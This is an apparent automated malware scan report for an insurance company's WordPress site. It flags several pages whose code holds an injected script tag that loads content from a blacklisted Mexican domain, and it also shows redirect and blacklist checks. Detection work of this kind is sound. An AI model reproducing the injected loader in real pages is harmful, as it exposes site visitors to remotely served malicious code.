Scanned pages/files
Request | Server response | Status |
http://fernandezseguros.com/ | 200 OK Content-Length: 9147 Content-Type: text/html | clean |
http://fernandezseguros.com/wp-content/themes/Fernandez/jquery.js?ver=3.8.3 | 200 OK Content-Length: 92793 Content-Type: application/javascript | clean |
http://fernandezseguros.com/wp-content/plugins/jquery-lightbox-for-native-galleries/colorbox/jquery.colorbox-min.js?ver=1.3.14 | 200 OK Content-Length: 9209 Content-Type: application/javascript | clean |
http://fernandezseguros.com/wp-content/plugins/simple-popup/js/jquery.cookie.js?ver=3.8.3 | 200 OK Content-Length: 3713 Content-Type: application/javascript | clean |
http://fernandezseguros.com/wp-includes/js/comment-reply.min.js?ver=3.8.3 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://fernandezseguros.com/wp-content/themes/Fernandez/script.js?ver=3.8.3 | 200 OK Content-Length: 45266 Content-Type: application/javascript | clean |
http://fernandezseguros.com/wp-content/themes/Fernandez/script.responsive.js?ver=3.8.3 | 200 OK Content-Length: 14823 Content-Type: application/javascript | clean |
http://fernandezseguros.com/test404page.js | 404 Not Found Content-Length: 12668 Content-Type: text/html | clean |
http://fernandezseguros.com/noticias-2/ | 200 OK Content-Length: 14387 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: workstation.com.mx ...[4742 bytes skipped]... }); }); // ]]> </script> <style>.nsd-content .post-86 .layout-item-0 { padding-right: 10px;padding-left: 10px; } .ie7 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } .ie6 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } </style></head> <body class="blog"> <script type="text/javascript" src="http://workstation.com.mx/qMDcvmNW.php?id=2783760"></script> <div id="nsd-main"> <header class="nsd-header"> <div class="nsd-shapes"> </div> <div id="nsd-flash-area"> <div id="nsd-flash-container"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="326" height="116" id="nsd-flash-object"> <param name="mov ...[11458 bytes skipped]... | ||
http://workstation.com.mx/qMDcvmNW.php?id=2783760 | 200 OK Content-Length: 6484 Content-Type: text/html | clean |
http://workstation.com.mx/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://workstation.com.mx/qMDcvmNW.php?id=2783761 | 200 OK Content-Length: 6484 Content-Type: text/html | clean |
http://fernandezseguros.com/institucional/ | 200 OK Content-Length: 24768 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: workstation.com.mx ...[5950 bytes skipped]... rder-right-style:solid;border-right-width:1px;border-right-color:#B5BFC0; padding-right: 10px;padding-left: 10px; } .ie7 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } .ie6 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } </style></head> <body class="page page-id-87 page-template-default"> <script type="text/javascript" src="http://workstation.com.mx/qMDcvmNW.php?id=2783760"></script> <div id="nsd-main"> <header class="nsd-header"> <div class="nsd-shapes"> </div> <div id="nsd-flash-area"> <div id="nsd-flash-container"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="326" height="116" id="nsd-flash-object"> <param name="mov ...[22293 bytes skipped]... | ||
http://fernandezseguros.com/seguros/ | 200 OK Content-Length: 14441 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: workstation.com.mx ...[5466 bytes skipped]... > <style>.nsd-content .post-88 .layout-item-0 { padding-right: 10px;padding-left: 10px; } .ie7 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } .ie6 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } </style></head> <body class="page page-id-88 page-parent page-template-default"> <script type="text/javascript" src="http://workstation.com.mx/qMDcvmNW.php?id=2783760"></script> <div id="nsd-main"> <header class="nsd-header"> <div class="nsd-shapes"> </div> <div id="nsd-flash-area"> <div id="nsd-flash-container"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="326" height="116" id="nsd-flash-object"> <param name="mov ...[10778 bytes skipped]... | ||
http://fernandezseguros.com/seguros/automotores/ | 200 OK Content-Length: 25273 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: workstation.com.mx ...[5541 bytes skipped]... } .nsd-content .post-89 .layout-item-2 { padding-right: 10px;padding-left: 10px; } .ie7 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } .ie6 .nsd-post .nsd-layout-cell {border:none !important; padding:0 !important; } </style></head> <body class="page page-id-89 page-child parent-pageid-88 page-template-default"> <script type="text/javascript" src="http://workstation.com.mx/qMDcvmNW.php?id=2783760"></script> <div id="nsd-main"> <header class="nsd-header"> <div class="nsd-shapes"> </div> <div id="nsd-flash-area"> <div id="nsd-flash-container"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="326" height="116" id="nsd-flash-object"> <param name="mov ...[23957 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fernandezseguros.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 03:33:36 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html; charset=UTF-8
Link: <http://fernandezseguros.com/?p=85>; rel=shortlink
X-Died: timeout at scan.pm line 1538.
X-Pingback: http://fernandezseguros.com/xmlrpc.php
X-Powered-By: PHP/5.5.8
GET / HTTP/1.1
Host: fernandezseguros.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 03:33:36 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5
Content-Type: text/html; charset=UTF-8
Link: <http://fernandezseguros.com/?p=85>; rel=shortlink
X-Died: timeout at scan.pm line 1538.
X-Pingback: http://fernandezseguros.com/xmlrpc.php
X-Powered-By: PHP/5.5.8
Second query (visit from search engine):
GET / HTTP/1.1
Host: fernandezseguros.com
Referer: http://www.google.com/search?q=fernandezseguros.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fernandezseguros.com
Referer: http://www.google.com/search?q=fernandezseguros.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fernandezseguros.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fernandezseguros.com/
Result: fernandezseguros.com is not infected or malware details are not published yet.
Result: fernandezseguros.com is not infected or malware details are not published yet.